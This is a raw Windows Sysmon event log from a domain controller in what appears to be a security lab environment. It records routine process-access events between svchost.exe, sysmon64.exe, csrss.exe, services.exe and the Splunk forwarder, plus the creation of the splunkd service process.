13:34:15.423{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001407Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.423{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001406Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.423{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001405Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.423{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001404Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.423{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001403Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.423{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001402Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.423{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.409{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.409{59A5CD1D-8E44-6005-0A00-00000000A301}8482664C:\Windows\system32\services.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+3332|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+220e1|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.853{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" serviceC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8E44-6005-0A00-00000000A301}848C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.392{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001384Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001383Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 